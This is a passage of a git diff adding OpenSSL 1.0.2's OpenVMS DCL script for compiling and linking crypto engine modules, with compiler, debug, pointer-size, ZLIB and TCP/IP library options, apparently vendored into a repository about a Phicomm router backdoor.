+$ TCPIP_ENGINES = ",,"
+$ IF COMPILER .EQS. "VAXC" THEN -
+     TCPIP_ENGINES = ",,"
+$!
+$! Set up two loops, one that keeps track of the engines,
+$! and one that keeps track of all the files going into
+$! the current engine.
+$!
+$! Here's the start of the engine loop.
+$!
+$ ENGINE_COUNTER = 0
+$ ENGINE_NEXT:
+$!
+$! Extract the current engine name, and if we've reached the end, stop
+$!
+$ ENGINE_NAME = F$ELEMENT(ENGINE_COUNTER,",",ENGINES)
+$ IF (ENGINE_NAME.EQS.",") THEN GOTO ENGINE_DONE
+$!
+$ ENGINE_COUNTER = ENGINE_COUNTER + 1
+$!
+$! Set up the engine library names.
+$!
+$ LIB_ENGINE = "ENGINE_" + ENGINE_NAME
+$!
+$! Check if the library module name actually is defined
+$!
+$ IF F$TYPE('LIB_ENGINE') .EQS. ""
+$ THEN
+$   WRITE SYS$ERROR ""
+$   WRITE SYS$ERROR "The module ",ENGINE_NAME," does not exist.  Continuing..."
+$   WRITE SYS$ERROR ""
+$   GOTO ENGINE_NEXT
+$ ENDIF
+$!
+$! Talk to the user
+$!
+$ IF ENGINE_NAME .NES. ""
+$ THEN
+$   WRITE SYS$OUTPUT "Compiling The ",ENGINE_NAME," Library Files. (",BUILDALL,")"
+$ ELSE
+$   WRITE SYS$OUTPUT "Compiling Support Files. (",BUILDALL,")"
+$ ENDIF
+$!
+$! Create a .OPT file for the object files (for a real engine name).
+$!
+$ IF ENGINE_NAME .NES. ""
+$ THEN
+$   OPEN /WRITE OBJECTS 'EXE_DIR''ENGINE_NAME'.OPT
+$ ENDIF
+$!
+$! Here's the start of per-engine module loop.
+$!
+$ FILE_COUNTER = 0
+$ FILE_NEXT:
+$!
+$! Extract the file name from the file list, and if we've reached the end, stop
+$!
+$ FILE_NAME = F$ELEMENT(FILE_COUNTER,",",'LIB_ENGINE')
+$ IF (FILE_NAME.EQS.",") THEN GOTO FILE_DONE
+$!
+$ FILE_COUNTER = FILE_COUNTER + 1
+$!
+$ IF FILE_NAME .EQS. "" THEN GOTO FILE_NEXT
+$!
+$! Set up the source and object reference
+$!
+$ IF F$TYPE('LIB_ENGINE'_SUBDIR) .EQS. ""
+$ THEN
+$     SOURCE_FILE = F$PARSE(FILE_NAME,"SYS$DISK:[].C",,,"SYNTAX_ONLY")
+$ ELSE
+$     SOURCE_FILE = F$PARSE(FILE_NAME,"SYS$DISK:[."+'LIB_ENGINE'_SUBDIR+"].C",,,"SYNTAX_ONLY")
+$ ENDIF
+$ OBJECT_FILE = OBJ_DIR + F$PARSE(FILE_NAME,,,"NAME","SYNTAX_ONLY") + ".OBJ"
+$!
+$! If we get some problem, we just go on trying to build the next module.
+$ ON WARNING THEN GOTO FILE_NEXT
+$!
+$! Check if the module we want to compile is actually there.
+$!
+$ IF F$SEARCH(SOURCE_FILE) .EQS. ""
+$ THEN
+$   WRITE SYS$OUTPUT ""
+$   WRITE SYS$OUTPUT "The File ",SOURCE_FILE," Doesn't Exist."
+$   WRITE SYS$OUTPUT ""
+$   GOTO EXIT
+$ ENDIF
+$!
+$! Talk to the user.
+$!
+$ WRITE SYS$OUTPUT "	",FILE_NAME,""
+$!
+$! Do the dirty work.
+$!
+$ ON ERROR THEN GOTO FILE_NEXT
+$ IF F$EDIT(F$PARSE(SOURCE_FILE,,,"TYPE","SYNTAX_ONLY"),"UPCASE") .EQS. ".MAR"
+$ THEN
+$   MACRO/OBJECT='OBJECT_FILE' 'SOURCE_FILE'
+$ ELSE
+$   CC/OBJECT='OBJECT_FILE' 'SOURCE_FILE'
+$ ENDIF
+$!
+$! Write the entry to the .OPT file (for a real engine name).
+$!
+$ IF ENGINE_NAME .NES. ""
+$ THEN
+$   WRITE OBJECTS OBJECT_FILE
+$ ENDIF
+$!
+$! Next file
+$!
+$ GOTO FILE_NEXT
+$!
+$ FILE_DONE:
+$!
+$! Do not link the support files.
+$!
+$ IF ENGINE_NAME .EQS. "" THEN GOTO ENGINE_NEXT
+$!
+$! Close the linker options file (for a real engine name).
+$!
+$ CLOSE OBJECTS
+$!
+$! Now, there are two ways to handle this.  We can either build 
+$! shareable images or stick the engine object file into libcrypto.
+$! For now, the latter is NOT supported.
+$!
+$!!!!! LIBRARY/REPLACE 'CRYPTO_LIB' 'OBJECT_FILE'
+$!
+$! For shareable libraries, we need to do things a little differently
+$! depending on if we link with a TCP/IP library or not.
+$!
+$ ENGINE_OPT := SYS$DISK:[]'ARCH'.OPT
+$ LINK /'DEBUGGER' /'LINKMAP' /'TRACEBACK' /SHARE='EXE_DIR''ENGINE_NAME'.EXE -
+   'EXE_DIR''ENGINE_NAME'.OPT /OPTIONS -
+   'TV_OBJ', -
+   'CRYPTO_LIB' /LIBRARY, -
+   'ENGINE_OPT' /OPTIONS -
+   'TCPIP_LIB' -
+   'ZLIB_LIB' -
+   ,'OPT_FILE' /OPTIONS
+$!
+$! Next engine
+$!
+$ GOTO ENGINE_NEXT
+$!
+$ ENGINE_DONE:
+$!
+$! Talk to the user
+$!
+$ WRITE SYS$OUTPUT "All Done..."
+$ EXIT:
+$ GOSUB CLEANUP
+$ EXIT
+$!
+$! Check For The Link Option FIle.
+$!
+$ CHECK_OPT_FILE:
+$!
+$! Check To See If We Need To Make A VAX C Option File.
+$!
+$ IF (COMPILER.EQS."VAXC")
+$ THEN
+$!
+$!  Check To See If We Already Have A VAX C Linker Option File.
+$!
+$   IF (F$SEARCH(OPT_FILE).EQS."")
+$   THEN
+$!
+$!    We Need A VAX C Linker Option File.
+$!
+$     CREATE 'OPT_FILE'
+$DECK
+!
+! Default System Options File To Link Against 
+! The Sharable VAX C Runtime Library.
+!
+SYS$SHARE:VAXCRTL.EXE/SHARE
+$EOD
+$!
+$!  End The Option File Check.
+$!
+$   ENDIF
+$!
+$! End The VAXC Check.
+$!
+$ ENDIF
+$!
+$! Check To See If We Need A GNU C Option File.
+$!
+$ IF (COMPILER.EQS."GNUC")
+$ THEN
+$!
+$!  Check To See If We Already Have A GNU C Linker Option File.
+$!
+$   IF (F$SEARCH(OPT_FILE).EQS."")
+$   THEN
+$!
+$!    We Need A GNU C Linker Option File.
+$!
+$     CREATE 'OPT_FILE'
+$DECK
+!
+! Default System Options File To Link Against 
+! The Sharable C Runtime Library.
+!
+GNU_CC:[000000]GCCLIB/LIBRARY
+SYS$SHARE:VAXCRTL/SHARE
+$EOD
+$!
+$!  End The Option File Check.
+$!
+$   ENDIF
+$!
+$! End The GNU C Check.
+$!
+$ ENDIF
+$!
+$! Check To See If We Need A DEC C Option File.
+$!
+$ IF (COMPILER.EQS."DECC")
+$ THEN
+$!
+$!  Check To See If We Already Have A DEC C Linker Option File.
+$!
+$   IF (F$SEARCH(OPT_FILE).EQS."")
+$   THEN
+$!
+$!    Figure Out If We Need A non-VAX Or A VAX Linker Option File.
+$!
+$     IF ARCH .EQS. "VAX"
+$     THEN
+$!
+$!      We Need A DEC C Linker Option File For VAX.
+$!
+$       CREATE 'OPT_FILE'
+$DECK
+!
+! Default System Options File To Link Against 
+! The Sharable DEC C Runtime Library.
+!
+SYS$SHARE:DECC$SHR.EXE/SHARE
+$EOD
+$!
+$!    Else...
+$!
+$     ELSE
+$!
+$!      Create The non-VAX Linker Option File.
+$!
+$       CREATE 'OPT_FILE'
+$DECK
+!
+! Default System Options File For non-VAX To Link Against 
+! The Sharable C Runtime Library.
+!
+SYS$SHARE:CMA$OPEN_LIB_SHR/SHARE
+SYS$SHARE:CMA$OPEN_RTL/SHARE
+$EOD
+$!
+$!    End The DEC C Option File Check.
+$!
+$     ENDIF
+$!
+$!  End The Option File Search.
+$!
+$   ENDIF
+$!
+$! End The DEC C Check.
+$!
+$ ENDIF
+$!
+$!  Tell The User What Linker Option File We Are Using.
+$!
+$ WRITE SYS$OUTPUT "Using Linker Option File ",OPT_FILE,"."	
+$!
+$! Time To RETURN.
+$!
+$ RETURN
+$!
+$! Check The User's Options.
+$!
+$ CHECK_OPTIONS:
+$!
+$! Check To See If OPT_PHASE Is Blank.
+$!
+$ IF (OPT_PHASE.EQS."ALL")
+$ THEN
+$!
+$!   OPT_PHASE Is Blank, So Build Everything.
+$!
+$    BUILDALL = "ALL"
+$!
+$! Else...
+$!
+$ ELSE
+$!
+$!  Else, Check To See If OPT_PHASE Has A Valid Argument.
+$!
+$   IF ("," + ACCEPT_PHASE + ",") - ("," + OPT_PHASE + ",") -
+       .NES. ("," + ACCEPT_PHASE + ",")
+$   THEN
+$!
+$!    A Valid Argument.
+$!
+$     BUILDALL = OPT_PHASE
+$!
+$!  Else...
+$!
+$   ELSE
+$!
+$!    Tell The User We Don't Know What They Want.
+$!
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT "The option ",OPT_PHASE," is invalid.  The valid options are:"
+$     WRITE SYS$OUTPUT ""
+$     IF ("," + ACCEPT_PHASE + ",") - ",ALL," -
+	.NES. ("," + ACCEPT_PHASE + ",") THEN -
+	WRITE SYS$OUTPUT "    ALL      :  just build everything."
+$     IF ("," + ACCEPT_PHASE + ",") - ",ENGINES," -
+	.NES. ("," + ACCEPT_PHASE + ",") THEN -
+	WRITE SYS$OUTPUT "    ENGINES  :  to compile just the [.xxx.EXE.ENGINES]*.EXE hareable images."
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT " where 'xxx' stands for:"
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT "    ALPHA[64]:  Alpha architecture."
+$     WRITE SYS$OUTPUT "    IA64[64] :  IA64 architecture."
+$     WRITE SYS$OUTPUT "    VAX      :  VAX architecture."
+$     WRITE SYS$OUTPUT ""
+$!
+$!    Time To EXIT.
+$!
+$     EXIT
+$!
+$!  End The Valid Argument Check.
+$!
+$   ENDIF
+$!
+$! End The OPT_PHASE Check.
+$!
+$ ENDIF
+$!
+$! Check To See If OPT_DEBUG Is Blank.
+$!
+$ IF (OPT_DEBUG.EQS."NODEBUG")
+$ THEN
+$!
+$!  OPT_DEBUG Is NODEBUG, So Compile Without The Debugger Information.
+$!
+$   DEBUGGER = "NODEBUG"
+$   LINKMAP = "NOMAP"
+$   TRACEBACK = "NOTRACEBACK" 
+$   GCC_OPTIMIZE = "OPTIMIZE"
+$   CC_OPTIMIZE = "OPTIMIZE"
+$   MACRO_OPTIMIZE = "OPTIMIZE"
+$   WRITE SYS$OUTPUT "No Debugger Information Will Be Produced During Compile."
+$   WRITE SYS$OUTPUT "Compiling With Compiler Optimization."
+$ ELSE
+$!
+$!  Check To See If We Are To Compile With Debugger Information.
+$!
+$   IF (OPT_DEBUG.EQS."DEBUG")
+$   THEN
+$!
+$!    Compile With Debugger Information.
+$!
+$     DEBUGGER = "DEBUG"
+$     LINKMAP = "MAP"
+$     TRACEBACK = "TRACEBACK"
+$     GCC_OPTIMIZE = "NOOPTIMIZE"
+$     CC_OPTIMIZE = "NOOPTIMIZE"
+$     MACRO_OPTIMIZE = "NOOPTIMIZE"
+$     WRITE SYS$OUTPUT "Debugger Information Will Be Produced During Compile."
+$     WRITE SYS$OUTPUT "Compiling Without Compiler Optimization."
+$   ELSE 
+$!
+$!    They Entered An Invalid Option.
+$!
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT "The Option ",OPT_DEBUG," Is Invalid.  The Valid Options Are:"
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT "     DEBUG   :  Compile With The Debugger Information."
+$     WRITE SYS$OUTPUT "     NODEBUG :  Compile Without The Debugger Information."
+$     WRITE SYS$OUTPUT ""
+$!
+$!    Time To EXIT.
+$!
+$     EXIT
+$!
+$!  End The Valid Argument Check.
+$!
+$   ENDIF
+$!
+$! End The OPT_DEBUG Check.
+$!
+$ ENDIF
+$!
+$! Special Threads For OpenVMS v7.1 Or Later
+$!
+$! Written By:  Richard Levitte
+$!              richard@levitte.org
+$!
+$!
+$! Check To See If We Have A Option For OPT_SPECIAL_THREADS.
+$!
+$ IF (OPT_SPECIAL_THREADS.EQS."")
+$ THEN
+$!
+$!  Get The Version Of VMS We Are Using.
+$!
+$   ISSEVEN :=
+$   TMP = F$ELEMENT(0,"-",F$EXTRACT(1,4,F$GETSYI("VERSION")))
+$   TMP = F$INTEGER(F$ELEMENT(0,".",TMP)+F$ELEMENT(1,".",TMP))
+$!
+$!  Check To See If The VMS Version Is v7.1 Or Later.
+$!
+$   IF (TMP.GE.71)
+$   THEN
+$!
+$!    We Have OpenVMS v7.1 Or Later, So Use The Special Threads.
+$!
+$     ISSEVEN := ,PTHREAD_USE_D4
+$!
+$!  End The VMS Version Check.
+$!
+$   ENDIF
+$!
+$! End The OPT_SPECIAL_THREADS Check.
+$!
+$ ENDIF
+$!
+$! Check OPT_POINTER_SIZE (P7).
+$!
+$ IF (OPT_POINTER_SIZE .NES. "") .AND. (ARCH .NES. "VAX")
+$ THEN
+$!
+$   IF (OPT_POINTER_SIZE .EQS. "32")
+$   THEN
+$     POINTER_SIZE = " /POINTER_SIZE=32"
+$   ELSE
+$     POINTER_SIZE = F$EDIT( OPT_POINTER_SIZE, "COLLAPSE, UPCASE")
+$     IF ((POINTER_SIZE .EQS. "64") .OR. -
+       (POINTER_SIZE .EQS. "64=") .OR. -
+       (POINTER_SIZE .EQS. "64=ARGV"))
+$     THEN
+$       ARCHD = ARCH+ "_64"
+$       LIB32 = ""
+$       POINTER_SIZE = " /POINTER_SIZE=64"
+$     ELSE
+$!
+$!      Tell The User Entered An Invalid Option.
+$!
+$       WRITE SYS$OUTPUT ""
+$       WRITE SYS$OUTPUT "The Option ", OPT_POINTER_SIZE, -
+         " Is Invalid.  The Valid Options Are:"
+$       WRITE SYS$OUTPUT ""
+$       WRITE SYS$OUTPUT -
+         "    """"       :  Compile with default (short) pointers."
+$       WRITE SYS$OUTPUT -
+         "    32       :  Compile with 32-bit (short) pointers."
+$       WRITE SYS$OUTPUT -
+         "    64       :  Compile with 64-bit (long) pointers (auto ARGV)."
+$       WRITE SYS$OUTPUT -
+         "    64=      :  Compile with 64-bit (long) pointers (no ARGV)."
+$       WRITE SYS$OUTPUT -
+         "    64=ARGV  :  Compile with 64-bit (long) pointers (ARGV)."
+$       WRITE SYS$OUTPUT ""
+$! 
+$!      Time To EXIT.
+$!
+$       EXIT
+$!
+$     ENDIF
+$!
+$   ENDIF
+$!
+$! End The OPT_POINTER_SIZE Check.
+$!
+$ ENDIF
+$!
+$! Set basic C compiler /INCLUDE directories.
+$!
+$ CC_INCLUDES = "SYS$DISK:[],SYS$DISK:[.VENDOR_DEFNS]"
+$!
+$! Check To See If OPT_COMPILER Is Blank.
+$!
+$ IF (OPT_COMPILER.EQS."")
+$ THEN
+$!
+$!  O.K., The User Didn't Specify A Compiler, Let's Try To
+$!  Find Out Which One To Use.
+$!
+$!  Check To See If We Have GNU C.
+$!
+$   IF (F$TRNLNM("GNU_CC").NES."")
+$   THEN
+$!
+$!    Looks Like GNUC, Set To Use GNUC.
+$!
+$     OPT_COMPILER = "GNUC"
+$!
+$!  Else...
+$!
+$   ELSE
+$!
+$!    Check To See If We Have VAXC Or DECC.
+$!
+$     IF (ARCH.NES."VAX").OR.(F$TRNLNM("DECC$CC_DEFAULT").NES."")
+$     THEN 
+$!
+$!      Looks Like DECC, Set To Use DECC.
+$!
+$       OPT_COMPILER = "DECC"
+$!
+$!    Else...
+$!
+$     ELSE
+$!
+$!      Looks Like VAXC, Set To Use VAXC.
+$!
+$       OPT_COMPILER = "VAXC"
+$!
+$!    End The VAXC Compiler Check.
+$!
+$     ENDIF
+$!
+$!  End The DECC & VAXC Compiler Check.
+$!
+$   ENDIF
+$!
+$!  End The Compiler Check.
+$!
+$ ENDIF
+$!
+$! Check To See If We Have A Option For OPT_TCPIP_LIB.
+$!
+$ IF (OPT_TCPIP_LIB.EQS."")
+$ THEN
+$!
+$!  Find out what socket library we have available
+$!
+$   IF F$PARSE("SOCKETSHR:") .NES. ""
+$   THEN
+$!
+$!    We have SOCKETSHR, and it is my opinion that it's the best to use.
+$!
+$     OPT_TCPIP_LIB = "SOCKETSHR"
+$!
+$!    Tell the user
+$!
+$     WRITE SYS$OUTPUT "Using SOCKETSHR for TCP/IP"
+$!
+$!    Else, let's look for something else
+$!
+$   ELSE
+$!
+$!    Like UCX (the reason to do this before Multinet is that the UCX
+$!    emulation is easier to use...)
+$!
+$     IF F$TRNLNM("UCX$IPC_SHR") .NES. "" -
+	 .OR. F$PARSE("SYS$SHARE:UCX$IPC_SHR.EXE") .NES. "" -
+	 .OR. F$PARSE("SYS$LIBRARY:UCX$IPC.OLB") .NES. ""
+$     THEN
+$!
+$!	Last resort: a UCX or UCX-compatible library
+$!
+$	OPT_TCPIP_LIB = "UCX"
+$!
+$!      Tell the user
+$!
+$       WRITE SYS$OUTPUT "Using UCX or an emulation thereof for TCP/IP"
+$!
+$!	That was all...
+$!
+$     ENDIF
+$   ENDIF
+$ ENDIF
+$!
+$! Set Up Initial CC Definitions, Possibly With User Ones
+$!
+$ CCDEFS = "TCPIP_TYPE_''OPT_TCPIP_LIB',DSO_VMS"
+$ IF F$TYPE(USER_CCDEFS) .NES. "" THEN CCDEFS = CCDEFS + "," + USER_CCDEFS
+$ CCEXTRAFLAGS = ""
+$ IF F$TYPE(USER_CCFLAGS) .NES. "" THEN CCEXTRAFLAGS = USER_CCFLAGS
+$ CCDISABLEWARNINGS = "" !!! "MAYLOSEDATA3" !!! "LONGLONGTYPE,LONGLONGSUFX"
+$ IF F$TYPE(USER_CCDISABLEWARNINGS) .NES. ""
+$ THEN
+$     IF CCDISABLEWARNINGS .NES. THEN CCDISABLEWARNINGS = CCDISABLEWARNINGS + ","
+$     CCDISABLEWARNINGS = CCDISABLEWARNINGS + USER_CCDISABLEWARNINGS
+$ ENDIF
+$!
+$! Check To See If We Have A ZLIB Option.
+$!
+$ IF (ZLIB .NES. "")
+$ THEN
+$!
+$!  Check for expected ZLIB files.
+$!
+$   err = 0
+$   file1 = f$parse( "zlib.h", ZLIB, , , "SYNTAX_ONLY")
+$   if (f$search( file1) .eqs. "")
+$   then
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT "The Option ", ZLIB, " Is Invalid."
+$     WRITE SYS$OUTPUT "    Can't find header: ''file1'"
+$     err = 1
+$   endif
+$   file1 = f$parse( "A.;", ZLIB)- "A.;"
+$!
+$   file2 = f$parse( ZLIB, "libz.olb", , , "SYNTAX_ONLY")
+$   if (f$search( file2) .eqs. "")
+$   then
+$     if (err .eq. 0)
+$     then
+$       WRITE SYS$OUTPUT ""
+$       WRITE SYS$OUTPUT "The Option ", ZLIB, " Is Invalid."
+$     endif
+$     WRITE SYS$OUTPUT "    Can't find library: ''file2'"
+$     WRITE SYS$OUTPUT ""
+$     err = err+ 2
+$   endif
+$   if (err .eq. 1)
+$   then
+$     WRITE SYS$OUTPUT ""
+$   endif
+$!
+$   if (err .ne. 0)
+$   then
+$     EXIT
+$   endif
+$!
+$   CCDEFS = """ZLIB=1"", "+ CCDEFS
+$   CC_INCLUDES = CC_INCLUDES+ ", "+ file1
+$   ZLIB_LIB = ", ''file2' /library"
+$!
+$!  Print info
+$!
+$   WRITE SYS$OUTPUT "ZLIB library spec: ", file2
+$!
+$! End The ZLIB Check.
+$!
+$ ENDIF
+$!
+$!  Check To See If The User Entered A Valid Parameter.
+$!
+$ IF (OPT_COMPILER.EQS."VAXC").OR.(OPT_COMPILER.EQS."DECC").OR.(OPT_COMPILER.EQS."GNUC")
+$ THEN
+$!
+$!    Check To See If The User Wanted DECC.
+$!
+$   IF (OPT_COMPILER.EQS."DECC")
+$   THEN
+$!
+$!    Looks Like DECC, Set To Use DECC.
+$!
+$     COMPILER = "DECC"
+$!
+$!    Tell The User We Are Using DECC.
+$!
+$     WRITE SYS$OUTPUT "Using DECC 'C' Compiler."
+$!
+$!    Use DECC...
+$!
+$     CC = "CC"
+$     IF ARCH.EQS."VAX" .AND. F$TRNLNM("DECC$CC_DEFAULT").NES."/DECC" -
+	 THEN CC = "CC/DECC"
+$     CC = CC + " /''CC_OPTIMIZE' /''DEBUGGER' /STANDARD=RELAXED"+ -
+       "''POINTER_SIZE' /NOLIST /PREFIX=ALL" + -
+       " /INCLUDE=(''CC_INCLUDES') " + -
+       CCEXTRAFLAGS
+$!
+$!    Define The Linker Options File Name.
+$!
+$     OPT_FILE = "VAX_DECC_OPTIONS.OPT"
+$!
+$!  End DECC Check.
+$!
+$   ENDIF
+$!
+$!  Check To See If We Are To Use VAXC.
+$!
+$   IF (OPT_COMPILER.EQS."VAXC")
+$   THEN
+$!
+$!    Looks Like VAXC, Set To Use VAXC.
+$!
+$     COMPILER = "VAXC"
+$!
+$!    Tell The User We Are Using VAX C.
+$!
+$     WRITE SYS$OUTPUT "Using VAXC 'C' Compiler."
+$!
+$!    Compile Using VAXC.
+$!
+$     CC = "CC"
+$     IF ARCH.NES."VAX"
+$     THEN
+$	WRITE SYS$OUTPUT "There is no VAX C on Alpha!"
+$	EXIT
+$     ENDIF
+$     IF F$TRNLNM("DECC$CC_DEFAULT").EQS."/DECC" THEN CC = "CC/VAXC"
+$     CC = CC + "/''CC_OPTIMIZE'/''DEBUGGER'/NOLIST" + -
+	   "/INCLUDE=(''CC_INCLUDES')" + -
+	   CCEXTRAFLAGS
+$     CCDEFS = """VAXC""," + CCDEFS
+$!
+$!    Define <sys> As SYS$COMMON:[SYSLIB]
+$!
+$     DEFINE/NOLOG SYS SYS$COMMON:[SYSLIB]
+$!
+$!    Define The Linker Options File Name.
+$!
+$     OPT_FILE = "VAX_VAXC_OPTIONS.OPT"
+$!
+$!  End VAXC Check
+$!
+$   ENDIF
+$!
+$!  Check To See If We Are To Use GNU C.
+$!
+$   IF (OPT_COMPILER.EQS."GNUC")
+$   THEN
+$!
+$!    Looks Like GNUC, Set To Use GNUC.
+$!
+$     COMPILER = "GNUC"
+$!
+$!    Tell The User We Are Using GNUC.
+$!
+$     WRITE SYS$OUTPUT "Using GNU 'C' Compiler."
+$!
+$!    Use GNU C...
+$!
+$     CC = "GCC/NOCASE_HACK/''GCC_OPTIMIZE'/''DEBUGGER'/NOLIST" + -
+	   "/INCLUDE=(''CC_INCLUDES')" + -
+	   CCEXTRAFLAGS
+$!
+$!    Define The Linker Options File Name.
+$!
+$     OPT_FILE = "VAX_GNUC_OPTIONS.OPT"
+$!
+$!  End The GNU C Check.
+$!
+$   ENDIF
+$!
+$!  Set up default defines
+$!
+$   CCDEFS = """FLAT_INC=1""," + CCDEFS
+$!
+$!  Finish up the definition of CC.
+$!
+$   IF COMPILER .EQS. "DECC"
+$   THEN
+$!    Not all compiler versions support MAYLOSEDATA3.
+$     OPT_TEST = "MAYLOSEDATA3"
+$     DEFINE /USER_MODE SYS$ERROR NL:
+$     DEFINE /USER_MODE SYS$OUTPUT NL:
+$     'CC' /NOCROSS_REFERENCE /NOLIST /NOOBJECT -
+       /WARNINGS = DISABLE = ('OPT_TEST', EMPTYFILE) NL:
+$     IF ($SEVERITY)
+$     THEN
+$       IF CCDISABLEWARNINGS .NES. "" THEN -
+         CCDISABLEWARNINGS = CCDISABLEWARNINGS+ ","
+$       CCDISABLEWARNINGS = CCDISABLEWARNINGS+ OPT_TEST
+$     ENDIF
+$     IF CCDISABLEWARNINGS .NES. ""
+$     THEN
+$       CCDISABLEWARNINGS = " /WARNING=(DISABLE=(" + CCDISABLEWARNINGS + "))"
+$     ENDIF
+$   ELSE
+$     CCDISABLEWARNINGS = ""
+$   ENDIF
+$   CC = CC + " /DEFINE=(" + CCDEFS + ")" + CCDISABLEWARNINGS
+$!
+$!  Show user the result
+$!
+$   WRITE/SYMBOL SYS$OUTPUT "Main C Compiling Command: ",CC
+$!
+$!  Else The User Entered An Invalid Argument.
+$!
+$ ELSE
+$!
+$!  Tell The User We Don't Know What They Want.
+$!
+$   WRITE SYS$OUTPUT ""
+$   WRITE SYS$OUTPUT "The Option ",OPT_COMPILER," Is Invalid.  The Valid Options Are:"
+$   WRITE SYS$OUTPUT ""
+$   WRITE SYS$OUTPUT "    VAXC  :  To Compile With VAX C."
+$   WRITE SYS$OUTPUT "    DECC  :  To Compile With DEC C."
+$   WRITE SYS$OUTPUT "    GNUC  :  To Compile With GNU C."
+$   WRITE SYS$OUTPUT ""
+$!
+$!  Time To EXIT.
+$!
+$   EXIT
+$!
+$! End The Valid Argument Check.
+$!
+$ ENDIF
+$!
+$! Build a MACRO command for the architecture at hand
+$!
+$ IF ARCH .EQS. "VAX"
+$ THEN
+$   MACRO = "MACRO/''DEBUGGER'"
+$ ELSE
+$   MACRO = "MACRO/MIGRATION/''DEBUGGER'/''MACRO_OPTIMIZE'"
+$ ENDIF
+$!
+$!  Show user the result
+$!
+$ WRITE/SYMBOL SYS$OUTPUT "Main MACRO Compiling Command: ",MACRO
+$!
+$! Time to check the contents, and to make sure we get the correct library.
+$!
+$ IF OPT_TCPIP_LIB.EQS."SOCKETSHR" .OR. OPT_TCPIP_LIB.EQS."MULTINET" -
+     .OR. OPT_TCPIP_LIB.EQS."UCX" .OR. OPT_TCPIP_LIB.EQS."TCPIP" -
+     .OR. OPT_TCPIP_LIB.EQS."NONE"
+$ THEN
+$!
+$!  Check to see if SOCKETSHR was chosen
+$!
+$   IF OPT_TCPIP_LIB.EQS."SOCKETSHR"
+$   THEN
+$!
+$!    Set the library to use SOCKETSHR
+$!
+$     TCPIP_LIB = ",SYS$DISK:[-.VMS]SOCKETSHR_SHR.OPT /OPTIONS"
+$!
+$!    Done with SOCKETSHR
+$!
+$   ENDIF
+$!
+$!  Check to see if MULTINET was chosen
+$!
+$   IF OPT_TCPIP_LIB.EQS."MULTINET"
+$   THEN
+$!
+$!    Set the library to use UCX emulation.
+$!
+$     OPT_TCPIP_LIB = "UCX"
+$!
+$!    Done with MULTINET
+$!
+$   ENDIF
+$!
+$!  Check to see if UCX was chosen
+$!
+$   IF OPT_TCPIP_LIB.EQS."UCX"
+$   THEN
+$!
+$!    Set the library to use UCX.
+$!
+$     TCPIP_LIB = "SYS$DISK:[-.VMS]UCX_SHR_DECC.OPT /OPTIONS"
+$     IF F$TRNLNM("UCX$IPC_SHR") .NES. ""
+$     THEN
+$       TCPIP_LIB = ",SYS$DISK:[-.VMS]UCX_SHR_DECC_LOG.OPT /OPTIONS"
+$     ELSE
+$       IF COMPILER .NES. "DECC" .AND. ARCH .EQS. "VAX" THEN -
+	  TCPIP_LIB = ",SYS$DISK:[-.VMS]UCX_SHR_VAXC.OPT /OPTIONS"
+$     ENDIF
+$!
+$!    Done with UCX
+$!
+$   ENDIF
+$!
+$!  Check to see if TCPIP was chosen
+$!
+$   IF OPT_TCPIP_LIB.EQS."TCPIP"
+$   THEN
+$!
+$!    Set the library to use TCPIP (post UCX).
+$!
+$     TCPIP_LIB = ",SYS$DISK:[-.VMS]TCPIP_SHR_DECC.OPT /OPTIONS"
+$!
+$!    Done with TCPIP
+$!
+$   ENDIF
+$!
+$!  Check to see if NONE was chosen
+$!
+$   IF OPT_TCPIP_LIB.EQS."NONE"
+$   THEN
+$!
+$!    Do not use a TCPIP library.
+$!
+$     TCPIP_LIB = ""
+$!
+$!    Done with TCPIP
+$!
+$   ENDIF
+$!
+$!  Print info
+$!
+$   WRITE SYS$OUTPUT "TCP/IP library spec: ", TCPIP_LIB- ","
+$!
+$!  Else The User Entered An Invalid Argument.
+$!
+$ ELSE
+$!
+$!  Tell The User We Don't Know What They Want.
+$!
+$   WRITE SYS$OUTPUT ""
+$   WRITE SYS$OUTPUT "The Option ",OPT_TCPIP_LIB," Is Invalid.  The Valid Options Are:"
+$   WRITE SYS$OUTPUT ""
+$   WRITE SYS$OUTPUT "    SOCKETSHR  :  To link with SOCKETSHR TCP/IP library."
+$   WRITE SYS$OUTPUT "    UCX        :  To link with UCX TCP/IP library."
+$   WRITE SYS$OUTPUT "    TCPIP      :  To link with TCPIP (post UCX) TCP/IP library."
+$   WRITE SYS$OUTPUT ""
+$!
+$!  Time To EXIT.
+$!
+$   EXIT
+$!
+$!  Done with TCP/IP libraries
+$!
+$ ENDIF
+$!
+$!  Time To RETURN...
+$!
+$ RETURN
+$!
+$ INITIALISE:
+$!
+$! Save old value of the logical name OPENSSL
+$!
+$ __SAVE_OPENSSL = F$TRNLNM("OPENSSL","LNM$PROCESS_TABLE")
+$!
+$! Save directory information
+$!
+$ __HERE = F$PARSE(F$PARSE("A.;",F$ENVIRONMENT("PROCEDURE"))-"A.;","[]A.;") - "A.;"
+$ __HERE = F$EDIT(__HERE,"UPCASE")
+$ __TOP = __HERE - "ENGINES]"
+$ __INCLUDE = __TOP + "INCLUDE.OPENSSL]"
+$!
+$! Set up the logical name OPENSSL to point at the include directory
+$!
+$ DEFINE OPENSSL /NOLOG '__INCLUDE'
+$!
+$! Done
+$!
+$ RETURN
+$!
+$ CLEANUP:
+$!
+$! Restore the saved logical name OPENSSL, if it had a value.
+$!
+$ if (f$type( __SAVE_OPENSSL) .nes. "")
+$ then
+$   IF __SAVE_OPENSSL .EQS. ""
+$   THEN
+$     DEASSIGN OPENSSL
+$   ELSE
+$     DEFINE /NOLOG OPENSSL '__SAVE_OPENSSL'
+$   ENDIF
+$ endif
+$!
+$! Close any open files.
+$!
+$ if (f$trnlnm( "objects", "LNM$PROCESS", 0, "SUPERVISOR") .nes. "") then -
+   close objects
+$!
+$! Done
+$!
+$ RETURN
+$!
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/vax.opt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/vax.opt
new file mode 100644
index 0000000..72e6bd8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/vax.opt
@@ -0,0 +1,9 @@
+!
